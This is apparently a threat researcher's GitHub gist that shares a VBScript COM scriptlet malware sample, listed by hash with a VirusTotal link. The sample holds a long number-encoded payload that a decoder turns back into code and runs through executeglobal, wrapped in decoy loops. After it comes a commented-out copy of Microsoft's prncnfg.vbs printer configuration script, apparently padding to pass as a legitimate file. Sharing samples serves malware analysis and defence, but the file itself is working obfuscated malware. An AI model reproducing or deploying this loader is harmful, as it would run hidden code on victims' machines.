Skip to content

Instantly share code, notes, and snippets.

@JohnLaTwC

JohnLaTwC/cf618029065ca2954054644bed2ac2d2a519926870c08d07a21f02a0afc9447e

Created August 30, 2018 15:51
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save JohnLaTwC/ccdcbeb85649ef9feaae045482d694b9 to your computer and use it in GitHub Desktop.
Save JohnLaTwC/ccdcbeb85649ef9feaae045482d694b9 to your computer and use it in GitHub Desktop.
Download ZIP
VBS COM Scriptlet threat
Raw
cf618029065ca2954054644bed2ac2d2a519926870c08d07a21f02a0afc9447e
## Uploaded by @JohnLaTwC
## Hash: cf618029065ca2954054644bed2ac2d2a519926870c08d07a21f02a0afc9447e
## VTLink: https://www.virustotal.com/#/file/cf618029065ca2954054644bed2ac2d2a519926870c08d07a21f02a0afc9447e/detection
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Pentest"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="VBScript">
q=115
w="12512822522622023121422523218514721522521612512821023114717614717021812512821722014721522521612512814914914717614721023112512821623022321612512822322321221521221622916122922921621523123016116521414717614721023112512822521621923114722421221622923123021722621522521623121216122922921621523123016116521414723122622514721722021623022321612512822322321221521221622916123123222621523123016116521414717614721023112512822521621923114722421221622923123021722621522521623121216123123222621523123016116521414723122622514721722012512815617122014715314714914721416214715221421622723022422621415214915514721421623521616117022914717614716521414723121623012512821023115916521415916623514722422021512512815617122015514717021814722522622023121422523221712512821323223014721522521612512816422014722921621522322621721623121622321621516116423412512816422014721622322021721623121622321621516116423412512823123521622514721622423223021622914722922622922921614722522612512815616422015514716623014721323223012512821323223014721522521612512821623222923115917015916421314715314714914718318819516214719916214718516214722322322022222223021223114914722523222916117022912512823123521622514721622423223021622914722922622922921614722522612512815616421315514716522714721323223012512822522622023121422523221714721522521612512823123521622512512822921623122022322723014715314721923121222721622321321223123221421623521616116623314715314716523414717614716523412512814923914914715314721522023023021621422622922716116623314715314716523414717614716523412512814923914914715314721622421222516116623314715314716523414717614716523412512823022421623122022322621414722522014716623314721921421221614722922621712512816623314722422021512512815617116715915914923023021621422622922721016516622522023414722422622921714715714723121421622321623014915523622921623222821421623521616121621422023322921623022022423422121322614717614723022421623122022322621414723121623012512815614916523322422021420723122622622920716120720717323023122421822422522023414915523121421622121322623121621814717614721621422023322921623022022423422121322614723121623012512823123521622514721622423223021622914722922622922921614722522612512815615514716523414722522622023121422523221712512822522622023121422523221714721522521612512823123521622512512822921623122022322723014715314723021623123221322022923123121216121622322021714715314714923914914715314714921714914715314714923914914715314714721623722023016121622322021714715314714923914914715314721622421222516121622322021714715314716521814717614716521812512823021622322021716115616322315514722921621522322621723121621816116423414722522014721622322021714721921421221614714722922621712512823123521622512512822921623122022322723014715314723021623123221322022923123121216122921621522322621714715314714923914914715314714921514914715314714923914914715314714914914715314714923914914715314721622421222516122921621522322621714715314716521814717614716521812512823022921621522322621721323223016115616322315514722921621522322621723121621816116423414722522014722921621522322621714721921421221614714722922621712512822921623122022322723014715314716322314717614716521812512815616322315514716521814722522622023121422523221712512822522622023121422523218514721522521612512823123521622512512821722014721522521612512822921623122022322723014715314721622723623121623322022921516121623322022921514715314714923914914715314721923121222716121623322022921514715314717123514717614717123512512822521621923114721623222923114717614723621521221622923022016121623322022921514714714721722012512823021623322022921516116423414722522014721623322022921514721921421221614714722922621712512815615514717123514722522622023121422523221712512822522622023121422523221714721522521612512816823515916721214715314722921623122022322723014715314714921822522023321421622916023022014914716722612512821822522021923122622514717614716321814723121623012512821923122023414721522521612512821623022622321416112512821521221622916114717614716823512512816721214721622322021722422622921721521222622316112512822521622722616112512816414717614721622723623116112512816523114721923122023412512815614922421221622923123016121321522621521214915523121421622121322621623121221622921414717614716523114714723121623012512816823515916523114714722422021512512815616721215514717222714722522622023121422523221712512821323223014721522521612512821722014721522521615412512821923121222723122922621923016115622623121623321223022923123015514721622322021723121621816121521222622322523422621522623021722121322614722523222916117022915412512822521621923114715622623121623321223022923123015523023123022023521621622322021716121521222622322523422621522623021722121322614721722015412512821722014721522521612512821822522021923122622514717614714716321814723121623012512821923122023414721522521612512821623022622321416
1125128226231216233212230229231230147216223220217226231216233212230161125128236215226213216230225226227230216229161215212226223225234226215227231231219221213226147216231220229234161125128225216227226161125128164147176147216227236231161125128163218147219231220234125128156149224212216229231230161213215226215212149155231214216221213226216231212216229214147176147163218147147231216230125128163218147147224220215125128225216219231147163163165147176147230232231212231230161215212226223225234226215227231231219221213226147147217220125128217220147215225216125128156226231216233212230229231230155147216223220217216231216223216215161215212226223225234226215226230217221213226125128225216219231147156226231216233212230229231230155147230231230220235216216223220217161215212226223225234226215226230217221213226147147217220125128156149231214216221213226224216231230236230216223220217161218225220231227220229214230149155147231214216221213226216231212216229214147176147215212226223225234226215226230217221213226147231216230125128149149147215225216230161215212226223225234226215227231231219221213226125128216230223212217147159167212147153147229216231220223227230147153147149218225220215225216230160230220149147153147149162149153147156230225215155231230226219147153147149162162173227231231219149159149231230226227149147225216227226161215212226223225234226215227231231219221213226125128156149227231231219223224235161165223224235230224149155231214216221213226216231212216229214147176147215212226223225234226215227231231219221213226147231216230125128156164147158147156149207149159167212155147233216229229231230225220147159167212155147215220224147153147171228147176147226231216233212230229231230125128217220147215225216125128229220215223223212231230225220147176147171228125128225216219231147149149147176147171228147217220125128156171228159167212155147166229147213232230125128125128125128125128225226220231214225232217147215225216125128149233212160225212225149147176147147164226147225216219231147149149147176147147164226147217220125128231235216225125128149161147149147153147216224212225236212223227230220215161230232229220233220231225212221213226147153147147164226147176147147164226125128230232229220233220231225212223226214147225220147230232229220233220231225212221213226147219214212216147229226217125128156163159149223228234149159149231214232215226229227230232229220233220231225212147224226229217147157147231214216223216230149155236229216232228214216235216161229216231225216214236231220229232214216230221213226147176147230232229220233220231225212223226214147231216198125128156214230147153147149207231226226229207231230226219223212214226223207207173230231224218224225220234149155231214216221213226231216218147176147229216231225216214236231220229232214216230221213226147231216230125128149229216231225216214236231220229232214216230149147176147214230147216230223216147149165229216231225216214236231220229232214216230149147176147214230147225216219231147169147177147225226220230229216233230226147147217220125128156225226220230229216233230226155147223212233216147176147225226220230229216233230226125128231235216225125128156220155147229231230225226220230229216233147147153147225226220230229216233230226147176147225226220230229216233230226125128156229231230225226220230229216233155147215225232226213232147226231147164147176147164237147147229226217125128149161149147153147156163155147229231230225226220230229216233147176147225226220230229216233230226125128156149161149159225226220230229216233161230224216231220223226214155147231220223227230147176147229231230225226220230229216233125128231235216225125128156149161149159225226220230229216233161166233155147231220223227230147176147229231230225226220230229216233125128230224216231220223226214147225220147166233147219214212216147229226217125128156171167159159149224216231230236230218225220231212229216227226210165166225220234147224226229217147157147231214216223216230149155236229216232228214216235216161216214220233229216230220224234221213226147176147230224216231220223226214147231216230125128156149165233224220214207231226226229207161207207148240216231212225226230229216227224220176223216233216223225226220231212225226230229216227224220238173230231224218224225220234149155231214216221213226231216218147176147216214220233229216230220224234221213226147231216230125128149149147176147164226125128231235216225147216224232230216229147229226229229216147225226125128164226147225226220231214225232217125128225226220231214225232217147215225216125128231235216225125128217220147215225216125128229226217147231220235216125128229216213224232225223212220229216230216224232223226233161222230220215147176147163214125128225216219231147149149147177175147229216213224232225223212220229216230216224232223226233161222230220215147147217220125128230222230220215147225220147222230220215147219214212216147229226217125128156149222230220215223212214220218226223210165166225220234147224226229217147157147231214216223216230149155147236229216232228214216235216161231226226229147176147230222230220215147231216230125128156149165233224220214207231226226229207161207207148240216231212225226230229216227224220176223216233216223225226220231212225226230229216227224220238173230231224218224225220234149155231214216221213226231216218147176147231226226229147231216230125128231235216225147216224232230216229147229226229229216147225226125128163214147225226220231214225232217125128213232230147215225216125128216232229231159216224212225223223212231230225220147153147229220215223223212231230225220159216224212225223223232217231227220229214230161231227220229214230234147216223220217236227226214161164234125128231235216193147216224232230216229147229226229229216147225226125128156155147167219147213232230125128225226220231214225232217147215225216125128217220147215225216125128217225220147176147172213125128216230223216125128217225220147176147172213125128218225220215212216229227230213230232147153147217225220147176147217225220125128229216231220223227230147153147164226147153147217225220147176147217225220125128229216231220223227230147153147149230232223227149147153147217225220147176147217225220125128231235216225125128229226217147231220235216125128229216231220223227230147153147225226220231227212214161226217225220230226147153147217225220147176147217225220125128230226147225220147226217225220230226147219214212216147229226217125128156149224216231230236230218225220231212229216227226210165166225220234147224226229217147157147231214216223216230149155147236229216232228214216235216161231226226229147176147230226147231216230125128156149165233224220214207231226226229207161207207148240216231212225226230229216227224220176223216233216223225226220231212225226230229216227224220238173230231224218224225220234149155231214216221213226231216218147176147231226226229147231216230125128229216231220223227230147153147156149152216224212225229216230232152149155230218225220229231230231225216224225226229220233225216215225212227235216161170229147153147147217225220147176147217225220125128229216231220223227230147153147156149152216224212225229216231232227224226214152149155230218225220229231230231225216224225226229220233225216215225212227235216161170229147153147147217225220147176147217225220125128229216231220223227230147153147163214147176147217225220125128225216219231147149149147176147217225220147147217220125128231235216225147216224232230216229147229226229229216147225226125128172213147225226220231214225232217125128225226220231214225232217147215225216125128231235216231216230225226227230216229161166235147176147167226125128215234147215225216230161166235125128216230223212217147159171220147153147149162149153147156230225215155231230226219147153147149162162173227231231219149159149231230226227149147225216227226161166235125128215234147176147167226125128156215234159147171220155147167226147225226220231214225232217125128125128125128215225216234125128231214216223216230147215225216125128171214125128149229216218218226223236216222149147147216230212214125128167234125128149215229226234230230212227149147147216230212214125128156166155171220159156165155171220159156164155171220147170222125128149231226219230160225216216229214230149147147216230212214125128156215234155147165227125128156164155147171220147176147215234125128149230230216214226229227160231220235216149147147216230212214125128156215234155147166230125128156164155147171220147176147215234125128149216231216223216215149147147216230212214125128156215234155147170218159149223223216219230160171220160230220149147167226125128156164155147171220147176147215234125128149223223216219230160171220149147147216230212214125128165234159149230230216214226229227160224232225216160230220149147167226125128149230230216214226229227160224232225216149147147216230212214125128156215234155147165218159149217212217160224232225216160230220149147167226125128156164155147171220147176147215234125128149217212217160224232225216149147147216230212214125128171235159149229216233220229215160224232225216160230220149147167226125128149229216233220229215160224232225216149147147216230212214125128156215234155147172227125128156164155147171220147176147215234125128149233214216229149147216230212214125128156165155147171220159156164155147171220147167233125128149215225216230160216231220230149147216230212214125128156165155147171220159156164155147171220147166229125128149215225216230149147216230212214125128171214125128149223223212231230225220225232149147216230212214125128231220232228161231227220229214230234125128216230226223214161172232125128215234147216231220229234161172232125128156216230223212217147159165159147216224212225223223212231230225220147153147229220215223223212231230225220155147216223220217231235216231225216227226161164234147147176147172232147231216230125128216230226223214161172232125128156164155147171220147176147215234125128149216231212215227232149147216230212214125128215234147216231232214216235216125128156164155147171220147176147215234125128149216231232214216214235216149147216230212214125128156163155147171220147216230212214147231214216223216230125128156229216231220223227230159172225155147231220223227230147176147171220125128217220147215225216125128217220147215225216125128164147158147230225215147176147230225215125128216230223216125128163147176147230225215125128225216219231147156231230226219155147215225232226213232147176177147230225215147217220125128225216219231147163163165147177175147230232231212231230161166235147217220125128156172213159149236215212216229160230220149155147167226147176147172225125128149149147176147172225125128168220125128216232229231147216223220219234125128170226125128231235216225147216224232230216229147229226229229216147225226125128125128163147176147230225215125128172232147224220215125128149149147176147216231212215231229212231230125128149149147176147218225220215212216229227230213230232125128149149147176147226217225220125128215234147224220215125128171220147224220215125128172225147224220215125128149177149147153147149239149147153147149175149147176147229216231220223227230125128156149227231231219223224235161165223224235230224149155231214216221213226216231212216229214147176147166235147231216230125128166235147224220215125128156149231214216221213226224216231230236230216223220217161218225220231227220229214230149155231214216221213226216231212216229214147176147164234147231216230125128164234147224220215125128156149223223216219230161231227220229214230234149155231214216221213226216231212216229214147176147170229147231216230125128170229147224220215125128125128156149168166168173216215161230225215227230161215212216215160236231219218220224149159149168166168173166163164161167164161171165161172167164149159149168166168173231216225161230225215215161215212216215160236231219218220224149155147236212229229212147176147231230226219125128"
For r=(0) To (400) Step (1)
if r mod 20 =(0) then
end if
t=(y)(Rnd mod 5 + r mod 7,Rnd)
next
stop
For r =(0) To ((len)((w))/3)-1 Step 1
u=(mid)((w),(r*3)+(1),(3))
i=(i) & (chrw)((u-q))
Next
stop
i=(StrReverse)((i))
executeglobal(("")& (i))
Function y(sMessage, strKey)
Dim o, p, aa, i, j, temp
Dim ss(256), k(256)
o= (Len)((strKey))
For i = (0) To (255)
k(i) = (asc)((Mid)((strKey), ((i Mod o)) + 1, 1))
Next
For i = (0) To (255)
j = (j + k(i) + ss(i)) Mod 256
Next
stop
For i = (1) To (1400)
p = (p + 1) Mod 25
aa= (aa+ ss(p)) Mod 256
Next
stop
For i = (1) To (Len)((sMessage))
p = (p + 1) Mod 256
p= (aa+ ss(p)) Mod 256
y =(y)& (ss((ss(p) + ss(aa)) Mod 256) & (Mid(sMessage, i, 1))) & (",")
Next
stop
''----------------------------------------------------------------------
''
'' Copyright (c) Microsoft Corporation. All rights reserved.
''
'' Abstract:
''
'' prncnfg.vbs - printer configuration script for WMI on Windows used to get
'' and set printer configuration also used to rename a printer
''
'' Usage:
'' prncnfg [-gtx?] [-s server] [-p printer] [-u user name] [-w password]
'' [-z new printer name] [-r port name] [-l location] [-m comment]
'' [-h share name] [-f sep-file] [-y data-type] [-st start time]
'' [-ut until time] [-o priority] [-i default priority]
'' [<+|->rawonly][<+|->keepprintedjobs][<+|->queued][<+|->workoffline]
'' [<+|->enabledevq][<+|->docompletefirst][<+|->enablebidi]
''
'' Examples:
'' prncnfg -g -s server -p printer
'' prncnfg -x -p printer -w "new Printer"
'' prncnfg -t -s server -p Printer -l "Building A/Floor 100/Office 1" -m "Color Printer"
'' prncnfg -t -p printer -h "Share" +shared -direct
'' prncnfg -t -p printer +rawonly +keepprintedjobs
'' prncnfg -t -p printer -st 2300 -ut 0215 -o 10 -i 5
''
''----------------------------------------------------------------------
'
'option explicit
'
''
'' Debugging trace flags, to enable debug output trace message
'' change gDebugFlag to true.
''
'const kDebugTrace = 1
'const kDebugError = 2
'dim gDebugFlag
'
'gDebugFlag = false
'
'const kFlagUpdateOnly = 1
'
''
'' Operation action values.
''
'const kActionUnknown = 0
'const kActionSet = 1
'const kActionGet = 2
'const kActionRename = 3
'
'const kErrorSuccess = 0
'const kErrorFailure = 1
'
''
'' Constants for the parameter dictionary
''
'const kServerName = 1
'const kPrinterName = 2
'const kNewPrinterName = 3
'const kShareName = 4
'const kPortName = 5
'const kDriverName = 6
'const kComment = 7
'const kLocation = 8
'const kSepFile = 9
'const kPrintProc = 10
'const kDataType = 11
'const kParameters = 12
'const kPriority = 13
'const kDefaultPriority = 14
'const kStartTime = 15
'const kUntilTime = 16
'const kQueued = 17
'const kDirect = 18
'const kDefault = 19
'const kShared = 20
'const kNetwork = 21
'const kHidden = 23
'const kLocal = 24
'const kEnableDevq = 25
'const kKeepPrintedJobs = 26
'const kDoCompleteFirst = 27
'const kWorkOffline = 28
'const kEnableBidi = 29
'const kRawOnly = 30
'const kPublished = 31
'const kUserName = 32
'const kPassword = 33
'
'const kNameSpace = "root\cimv2"
'
''
'' Generic strings
''
'const L_Empty_Text = ""
'const L_Space_Text = " "
'const L_Error_Text = "Error"
'const L_Success_Text = "Success"
'const L_Failed_Text = "Failed"
'const L_Hex_Text = "0x"
'const L_Printer_Text = "Printer"
'const L_Operation_Text = "Operation"
'const L_Provider_Text = "Provider"
'const L_Description_Text = "Description"
'const L_Debug_Text = "Debug:"
'
''
'' General usage messages
''
'const L_Help_Help_General01_Text = "Usage: prncnfg [-gtx?] [-s server][-p printer][-z new printer name]"
'const L_Help_Help_General02_Text = " [-u user name][-w password][-r port name][-l location]"
'const L_Help_Help_General03_Text = " [-m comment][-h share name][-f sep file][-y datatype]"
'const L_Help_Help_General04_Text = " [-st start time][-ut until time][-i default priority]"
'const L_Help_Help_General05_Text = " [-o priority][<+|->shared][<+|->direct][<+|->hidden]"
'const L_Help_Help_General06_Text = " [<+|->published][<+|->rawonly][<+|->queued][<+|->enablebidi]"
'const L_Help_Help_General07_Text = " [<+|->keepprintedjobs][<+|->workoffline][<+|->enabledevq]"
'const L_Help_Help_General08_Text = " [<+|->docompletefirst]"
'const L_Help_Help_General09_Text = "Arguments:"
'const L_Help_Help_General10_Text = "-f - separator file name"
'const L_Help_Help_General11_Text = "-g - get configuration"
'const L_Help_Help_General12_Text = "-h - share name"
'const L_Help_Help_General13_Text = "-i - default priority"
'const L_Help_Help_General14_Text = "-l - location string"
'const L_Help_Help_General15_Text = "-m - comment string"
'const L_Help_Help_General16_Text = "-o - priority"
'const L_Help_Help_General17_Text = "-p - printer name"
'const L_Help_Help_General18_Text = "-r - port name"
'const L_Help_Help_General19_Text = "-s - server name"
'const L_Help_Help_General20_Text = "-st - start time"
'const L_Help_Help_General21_Text = "-t - set configuration"
'const L_Help_Help_General22_Text = "-u - user name"
'const L_Help_Help_General23_Text = "-ut - until time"
'const L_Help_Help_General24_Text = "-w - password"
'const L_Help_Help_General25_Text = "-x - change printer name"
'const L_Help_Help_General26_Text = "-y - data type string"
'const L_Help_Help_General27_Text = "-z - new printer name"
'const L_Help_Help_General28_Text = "-? - display command usage"
'const L_Help_Help_General29_Text = "Examples:"
'const L_Help_Help_General30_Text = "prncnfg -g -s server -p printer"
'const L_Help_Help_General31_Text = "prncnfg -x -s server -p printer -z ""new printer"""
'const L_Help_Help_General32_Text = "prncnfg -t -p printer -l ""Building A/Floor 100/Office 1"" -m ""Color Printer"""
'const L_Help_Help_General33_Text = "prncnfg -t -p printer -h ""Share"" +shared -direct"
'const L_Help_Help_General34_Text = "prncnfg -t -p printer +rawonly +keepprintedjobs"
'const L_Help_Help_General35_Text = "prncnfg -t -p printer -st 2300 -ut 0215 -o 1 -i 5"
'
''
'' Messages to be displayed if the scripting host is not cscript
''
'const L_Help_Help_Host01_Text = "This script should be executed from the Command Prompt using CScript.exe."
'const L_Help_Help_Host02_Text = "For example: CScript script.vbs arguments"
'const L_Help_Help_Host03_Text = ""
'const L_Help_Help_Host04_Text = "To set CScript as the default application to run .VBS files run the following:"
'const L_Help_Help_Host05_Text = " CScript //H:CScript //S"
'const L_Help_Help_Host06_Text = "You can then run ""script.vbs arguments"" without preceding the script with CScript."
'
''
'' General error messages
''
'const L_Text_Error_General01_Text = "The scripting host could not be determined."
'const L_Text_Error_General02_Text = "Unable to parse command line."
'const L_Text_Error_General03_Text = "Win32 error code"
'
''
'' Miscellaneous messages
''
'const L_Text_Msg_General01_Text = "Renamed printer"
'const L_Text_Msg_General02_Text = "New printer name"
'const L_Text_Msg_General03_Text = "Unable to rename printer"
'const L_Text_Msg_General04_Text = "Unable to get configuration for printer"
'const L_Text_Msg_General05_Text = "Printer always available"
'const L_Text_Msg_General06_Text = "Configured printer"
'const L_Text_Msg_General07_Text = "Unable to configure printer"
'const L_Text_Msg_General08_Text = "Unable to get SWbemLocator object"
'const L_Text_Msg_General09_Text = "Unable to connect to WMI service"
'const L_Text_Msg_General10_Text = "Printer status"
'const L_Text_Msg_General11_Text = "Extended printer status"
'const L_Text_Msg_General12_Text = "Detected error state"
'const L_Text_Msg_General13_Text = "Extended detected error state"
'
''
'' Printer properties
''
'const L_Text_Msg_Printer01_Text = "Server name"
'const L_Text_Msg_Printer02_Text = "Printer name"
'const L_Text_Msg_Printer03_Text = "Share name"
'const L_Text_Msg_Printer04_Text = "Driver name"
'const L_Text_Msg_Printer05_Text = "Port name"
'const L_Text_Msg_Printer06_Text = "Comment"
'const L_Text_Msg_Printer07_Text = "Location"
'const L_Text_Msg_Printer08_Text = "Separator file"
'const L_Text_Msg_Printer09_Text = "Print processor"
'const L_Text_Msg_Printer10_Text = "Data type"
'const L_Text_Msg_Printer11_Text = "Parameters"
'const L_Text_Msg_Printer12_Text = "Attributes"
'const L_Text_Msg_Printer13_Text = "Priority"
'const L_Text_Msg_Printer14_Text = "Default priority"
'const L_Text_Msg_Printer15_Text = "Start time"
'const L_Text_Msg_Printer16_Text = "Until time"
'const L_Text_Msg_Printer17_Text = "Status"
'const L_Text_Msg_Printer18_Text = "Job count"
'const L_Text_Msg_Printer19_Text = "Average pages per minute"
'
''
'' Printer attributes
''
'const L_Text_Msg_Attrib01_Text = "direct"
'const L_Text_Msg_Attrib02_Text = "raw_only"
'const L_Text_Msg_Attrib03_Text = "local"
'const L_Text_Msg_Attrib04_Text = "shared"
'const L_Text_Msg_Attrib05_Text = "keep_printed_jobs"
'const L_Text_Msg_Attrib06_Text = "published"
'const L_Text_Msg_Attrib07_Text = "queued"
'const L_Text_Msg_Attrib08_Text = "default"
'const L_Text_Msg_Attrib09_Text = "network"
'const L_Text_Msg_Attrib10_Text = "enable_bidi"
'const L_Text_Msg_Attrib11_Text = "do_complete_first"
'const L_Text_Msg_Attrib12_Text = "work_offline"
'const L_Text_Msg_Attrib13_Text = "hidden"
'const L_Text_Msg_Attrib14_Text = "enable_devq_print"
'
''
'' Printer status
''
'const L_Text_Msg_Status01_Text = "Other"
'const L_Text_Msg_Status02_Text = "Unknown"
'const L_Text_Msg_Status03_Text = "Idle"
'const L_Text_Msg_Status04_Text = "Printing"
'const L_Text_Msg_Status05_Text = "Warmup"
'const L_Text_Msg_Status06_Text = "Stopped printing"
'const L_Text_Msg_Status07_Text = "Offline"
'const L_Text_Msg_Status08_Text = "Paused"
'const L_Text_Msg_Status09_Text = "Error"
'const L_Text_Msg_Status10_Text = "Busy"
'const L_Text_Msg_Status11_Text = "Not available"
'const L_Text_Msg_Status12_Text = "Waiting"
'const L_Text_Msg_Status13_Text = "Processing"
'const L_Text_Msg_Status14_Text = "Initializing"
'const L_Text_Msg_Status15_Text = "Power save"
'const L_Text_Msg_Status16_Text = "Pending deletion"
'const L_Text_Msg_Status17_Text = "I/O active"
'const L_Text_Msg_Status18_Text = "Manual feed"
'const L_Text_Msg_Status19_Text = "No error"
'const L_Text_Msg_Status20_Text = "Low paper"
'const L_Text_Msg_Status21_Text = "No paper"
'const L_Text_Msg_Status22_Text = "Low toner"
'const L_Text_Msg_Status23_Text = "No toner"
'const L_Text_Msg_Status24_Text = "Door open"
'const L_Text_Msg_Status25_Text = "Jammed"
'const L_Text_Msg_Status26_Text = "Service requested"
'const L_Text_Msg_Status27_Text = "Output bin full"
'const L_Text_Msg_Status28_Text = "Paper problem"
'const L_Text_Msg_Status29_Text = "Cannot print page"
'const L_Text_Msg_Status30_Text = "User intervention required"
'const L_Text_Msg_Status31_Text = "Out of memory"
'const L_Text_Msg_Status32_Text = "Server unknown"
'
'
''
'' Debug messages
''
'const L_Text_Dbg_Msg01_Text = "In function RenamePrinter"
'const L_Text_Dbg_Msg02_Text = "New printer name"
'const L_Text_Dbg_Msg03_Text = "In function GetPrinter"
'const L_Text_Dbg_Msg04_Text = "In function SetPrinter"
'const L_Text_Dbg_Msg05_Text = "In function ParseCommandLine"
'
'main
'
''
'' Main execution starts here
''
'sub main
'
' dim iAction
' dim iRetval
' dim oParamDict
'
' '
' ' Abort if the host is not cscript
' '
' if not IsHostCscript() then
'
'' call 'wscript.echo(L_Help_Help_Host01_Text & vbCRLF & L_Help_Help_Host02_Text & vbCRLF & _
' ' L_Help_Help_Host03_Text & vbCRLF & L_Help_Help_Host04_Text & vbCRLF & _
' ' L_Help_Help_Host05_Text & vbCRLF & L_Help_Help_Host06_Text & vbCRLF)
'
'' wscript.quit
'
' end if
'
' set oParamDict = CreateObject("Scripting.Dictionary")
'
' iRetval = ParseCommandLine(iAction, oParamDict)
'
' if iRetval = kErrorSuccess then
'
' select case iAction
'
' case kActionSet
' iRetval = SetPrinter(oParamDict)
'
' case kActionGet
' iRetval = GetPrinter(oParamDict)
'
' case kActionRename
' iRetval = RenamePrinter(oParamDict)
'
' case else
' Usage(True)
' exit sub
'
' end select
'
' end if
'
'end sub
'
''
'' Rename printer
''
'function RenamePrinter(oParamDict)
'
' on error resume next
'
' DebugPrint kDebugTrace, L_Text_Dbg_Msg01_Text
' DebugPrint kDebugTrace, L_Text_Msg_Printer01_Text & L_Space_Text & oParamDict.Item(kServerName)
' DebugPrint kDebugTrace, L_Text_Msg_Printer02_Text & L_Space_Text & oParamDict.Item(kPrinterName)
' DebugPrint kDebugTrace, L_Text_Dbg_Msg02_Text & L_Space_Text & oParamDict.Item(kNewPrinterName)
'
' dim oPrinter
' dim oService
' dim iRetval
' dim uResult
' dim strServer
' dim strPrinter
' dim strNewName
' dim strUser
' dim strPassword
'
' iRetval = kErrorFailure
'
' strServer = oParamDict.Item(kServerName)
' strPrinter = oParamDict.Item(kPrinterName)
' strNewName = oParamDict.Item(kNewPrinterName)
' strUser = oParamDict.Item(kUserName)
' strPassword = oParamDict.Item(kPassword)
'
' if WmiConnect(strServer, kNameSpace, strUser, strPassword, oService) then
'
' set oPrinter = oService.Get("Win32_Printer.DeviceID='" & strPrinter & "'")
'
' else
'
' RenamePrinter = kErrorFailure
'
' exit function
'
' end if
'
' '
' ' Check if Get was successful
' '
' if Err.Number = kErrorSuccess then
'
' uResult = oPrinter.RenamePrinter(strNewName)
'
' if Err.Number = kErrorSuccess then
'
' if uResult = kErrorSuccess then
'
'
' iRetval = kErrorSuccess
'
' else
'
' 'wscript.echo L_Text_Msg_General03_Text & L_Space_Text & strPrinter & L_Space_Text _
'' & L_Text_Error_General03_Text & L_Space_Text & uResult
'
' end if
'
' else
'
' 'wscript.echo L_Text_Msg_General04_Text & L_Space_Text & strPrinter & L_Space_Text _
' & L_Error_Text & L_Space_Text & L_Hex_Text & hex(Err.Number) & L_Space_Text _
' & Err.Description
'
' end if
'
' else
'
' 'wscript.echo L_Text_Msg_General04_Text & L_Space_Text & strPrinter & L_Space_Text _
' & L_Error_Text & L_Space_Text & L_Hex_Text & hex(Err.Number) & L_Space_Text _
' & Err.Description
'
' '
' ' Try getting extended error information
' '
' call LastError()
'
' end if
'
' RenamePrinter = iRetval
'
'end function
'
''
'' Get printer configuration
''
'function GetPrinter(oParamDict)
'
' on error resume next
'
' DebugPrint kDebugTrace, L_Text_Dbg_Msg03_Text
' DebugPrint kDebugTrace, L_Text_Msg_Printer01_Text & L_Space_Text & oParamDict.Item(kServerName)
' DebugPrint kDebugTrace, L_Text_Msg_Printer02_Text & L_Space_Text & oParamDict.Item(kPrinterName)
'
' dim oPrinter
' dim oService
' dim iRetval
' dim uResult
' dim strServer
' dim strPrinter
' dim strAttributes
' dim strStart
' dim strEnd
' dim strUser
' dim strPassword
'
' iRetval = kErrorFailure
'
' strServer = oParamDict.Item(kServerName)
' strPrinter = oParamDict.Item(kPrinterName)
' strUser = oParamDict.Item(kUserName)
' strPassword = oParamDict.Item(kPassword)
'
' if WmiConnect(strServer, kNameSpace, strUser, strPassword, oService) then
'
' set oPrinter = oService.Get("Win32_Printer='" & strPrinter & "'")
'
' else
'
' GetPrinter = kErrorFailure
'
' exit function
'
' end if
'
' '
' ' Check if Get was successful
' '
' if Err.Number = kErrorSuccess then
'
' 'wscript.echo L_Text_Msg_Printer01_Text & L_Space_Text & strServer
' 'wscript.echo L_Text_Msg_Printer02_Text & L_Space_Text & oPrinter.DeviceID
' 'wscript.echo L_Text_Msg_Printer03_Text & L_Space_Text & oPrinter.ShareName
' 'wscript.echo L_Text_Msg_Printer04_Text & L_Space_Text & oPrinter.DriverName
' 'wscript.echo L_Text_Msg_Printer05_Text & L_Space_Text & oPrinter.PortName
' 'wscript.echo L_Text_Msg_Printer06_Text & L_Space_Text & oPrinter.Comment
' 'wscript.echo L_Text_Msg_Printer07_Text & L_Space_Text & oPrinter.Location
' 'wscript.echo L_Text_Msg_Printer08_Text & L_Space_Text & oPrinter.SeparatorFile
' 'wscript.echo L_Text_Msg_Printer09_Text & L_Space_Text & oPrinter.PrintProcessor
' 'wscript.echo L_Text_Msg_Printer10_Text & L_Space_Text & oPrinter.PrintJobDatatype
' 'wscript.echo L_Text_Msg_Printer11_Text & L_Space_Text & oPrinter.Parameters
' 'wscript.echo L_Text_Msg_Printer13_Text & L_Space_Text & CStr(oPrinter.Priority)
' 'wscript.echo L_Text_Msg_Printer14_Text & L_Space_Text & CStr(oPrinter.DefaultPriority)
'
' strStart = Mid(CStr(oPrinter.StartTime), 9, 4)
' strEnd = Mid(CStr(oPrinter.UntilTime), 9, 4)
'
' if strStart <> "" and strEnd <> "" then
'
' 'wscript.echo L_Text_Msg_Printer15_Text & L_Space_Text & Mid(strStart, 1, 2) & "h" & Mid(strStart, 3, 2)
' 'wscript.echo L_Text_Msg_Printer16_Text & L_Space_Text & Mid(strEnd, 1, 2) & "h" & Mid(strEnd, 3, 2)
'
' else
'
' 'wscript.echo L_Text_Msg_General05_Text
'
' end if
'
' strAttributes = L_Text_Msg_Printer12_Text
'
' if oPrinter.Direct then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib01_Text
'
' end if
'
' if oPrinter.RawOnly then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib02_Text
'
' end if
'
' if oPrinter.Local then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib03_Text
'
' end if
'
' if oPrinter.Shared then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib04_Text
'
' end if
'
' if oPrinter.KeepPrintedJobs then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib05_Text
'
' end if
'
' if oPrinter.Published then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib06_Text
'
' end if
'
' if oPrinter.Queued then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib07_Text
'
' end if
'
' if oPrinter.Default then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib08_Text
'
' end if
'
' if oPrinter.Network then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib09_Text
'
' end if
'
